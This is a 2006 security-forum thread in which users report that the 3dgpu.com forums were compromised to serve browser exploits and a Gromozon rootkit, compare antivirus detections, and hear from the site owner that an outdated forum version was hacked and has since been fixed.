eset please check out 3dgpu.com forums.

Discussion in 'malware problems & news' started by attila4000, Oct 10, 2006.

Thread Status:
Not open for further replies.
  1. attila4000

    attila4000 Registered Member

    Joined:
    Feb 7, 2005
    Posts:
    51
    Location:
    Rahway, NJ, USA
    3dgpu.com forums tried but failed to infect me with a variant of win32/exploit.wmf trojan and a html/exploit.ieslice trojan.
    it is on the web page section for:

    Monday - October 9th, 2006
    i went to click the link: You can read more in our forums here.

    i am unable to contact Adam at the bottom of the section.
     
  2. phasechange

    phasechange Registered Member

    Joined:
    Aug 10, 2004
    Posts:
    359
    Location:
    Edinburgh
    must not try link... must not try link... :D
     
  3. Firecat

    Firecat Registered Member

    Joined:
    Jan 2, 2005
    Posts:
    7,927
    Location:
    The land of no identity :D
    I don't think it was intentional. AFAIK 3DGPU is not a rogue site....
     
  4. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Yeah, they've been compromised. There's an iframe that loads hxxp://link removed which contains various exploits, the malware executable/infection starter is located at hxxp://link removed.
     
    Last edited by a moderator: Oct 11, 2006
  5. Londonbeat

    Londonbeat Registered Member

    Joined:
    Sep 21, 2006
    Posts:
    350
    I checked out the forum page and it tried to download "www.trwyol.com" file, this is only detected by 3 AV's as 'suspicious'.
     
  6. the_sly_dog

    the_sly_dog Registered Member

    Joined:
    Feb 28, 2006
    Posts:
    297
    Location:
    The Heart Of London
    hi all

    i did try to go to that forum and my nod32 went mad and warned me too

    imon says infected 16 cleaned 6 and sent two files to the lab for analysis

    does that mean nod32 caught all the infections it tried to give me o_O

    http://img291.imageshack.us/img291/9899/desktopfq6.jpg

    The file 'link removed' has been sent to Eset's labs for analysis.

    The file 'Matrix.class' has been sent to Eset's labs for analysis.
     
    Last edited by a moderator: Oct 11, 2006
  7. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Weird, it didn't do the same thing to me. That name 'www.trwyol.com' looks like a typical gromozon symptom. Be very careful with this site, gromozon is unbelievably bad news... :(
     
  8. Londonbeat

    Londonbeat Registered Member

    Joined:
    Sep 21, 2006
    Posts:
    350
    I'm using firefox, didnt receive any warnings from NOD32 at all, I've got it zipped up and will send it to all AV vendors.
     
  9. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Yeah, the iframe just loads an empty page with Firefox. I tested it with wget and custom user agent...
     
  10. Toby75

    Toby75 Registered Member

    Joined:
    Mar 10, 2006
    Posts:
    480
    Antivir blocked everything as expected :D
     
  11. JerryM

    JerryM Registered Member

    Joined:
    Aug 31, 2003
    Posts:
    4,221
    What version are you using, Classic or Premium? I guess there would not be a difference in the detection.

    Thanks,
    Jerry
     
  12. Toby75

    Toby75 Registered Member

    Joined:
    Mar 10, 2006
    Posts:
    480
    I use Classic...yep...they both use the exact same scanning engine and definition database.
     
  13. Toby75

    Toby75 Registered Member

    Joined:
    Mar 10, 2006
    Posts:
    480
    Yeah...same happens with opera.
     
  14. Technodrome

    Technodrome Security Expert

    Joined:
    Feb 13, 2002
    Posts:
    2,140
    Location:
    New York
    All malware links were removed. Please do not post direct links to malware/infected files in your post.


    tD
     
    Last edited: Oct 11, 2006
  15. pykko

    pykko Registered Member

    Joined:
    Apr 27, 2005
    Posts:
    2,236
    Location:
    Romania...and walking to heaven
    site seems down now. the formu section I mean. :(
     
  16. Londonbeat

    Londonbeat Registered Member

    Joined:
    Sep 21, 2006
    Posts:
    350
    Update on the file "www.trwyol.com", it sits harmlessly on the desktop till activated, then once executed, it adds a BHO (emog.dll) on hijackthis, then when you open internet explorer it tries to download all manner of crap including 4 different files BOClean stopped, a trojan downloader and a new variant of Spysherrif adware. Also, it blocks access to this site, castlecops, gladiator and tech-guy sites on both firefox and IE.
     
  17. attila4000

    attila4000 Registered Member

    Joined:
    Feb 7, 2005
    Posts:
    51
    Location:
    Rahway, NJ, USA
    "I don't think it was intentional. AFAIK 3DGPU is not a rogue site...."

    it was not intentional, that is why i asked eset to do the actual checking of the site's trojan link. they have isolated computers to check such a site without infecting an important work computer or lan. this is the first time i went unknowingly to an infected forum. nod32 stopped the trojans and IE crashed.
     
  18. Londonbeat

    Londonbeat Registered Member

    Joined:
    Sep 21, 2006
    Posts:
    350
    You were right, I tried everything to sort it even deleted hosts file etc but I still couldnt access security sites or run superantispyware, I temporarily changed the name of SAS.exe, ran it and it detected Gromozon rootkit in Windows directory, removed and all is fixed.
    This rootkit was completely missed by Blacklight, Sophos anti-rootkit and sysinternals rootkitrevealer, additionally it blocks you from accessing prevx website to download removal tool. :blink:
     
  19. mjkawecki

    mjkawecki Registered Member

    Joined:
    Oct 13, 2006
    Posts:
    2
    Hello, attila posted over at 3dgpu.com and left a comment linking here. While it seems as though the consensus/understanding here is that we at 3dgpu.com were hacked by an outside source, as the owner of 3dgpu, I wanted to confirm and assure everyone that we had less than zero to do with this.

    Unless of course you count having our IPB forum software down by one revision level (2.1.6 instead of the current 2.1.7).

    We acted quickly once it became apparent that we had been hacked and fixed the problem.

    My appologies to anyone affected by the hack. :doubt:
     
  20. mjkawecki

    mjkawecki Registered Member

    Joined:
    Oct 13, 2006
    Posts:
    2
    Attila, besides chasing you around the 'net and making it clear that this isn't a problem anymore despite the fashion in which you are presenting it, you made the statement that you were unable to contact Adam, why would you try to contact Adam instead of me (BULL @ 3dgpu).

    From my perspective, it seems as though you are taking a bit to much joy in posting this on different forums implying (intentional or otherwise) that our forums are still infected.

    This hack was devestating to our members/readership and traffic, please try not to make a point of over emphasizing it, especially after the fact without letting it be known that it has been corrected.
     
Loading...
Thread Status:
Not open for further replies.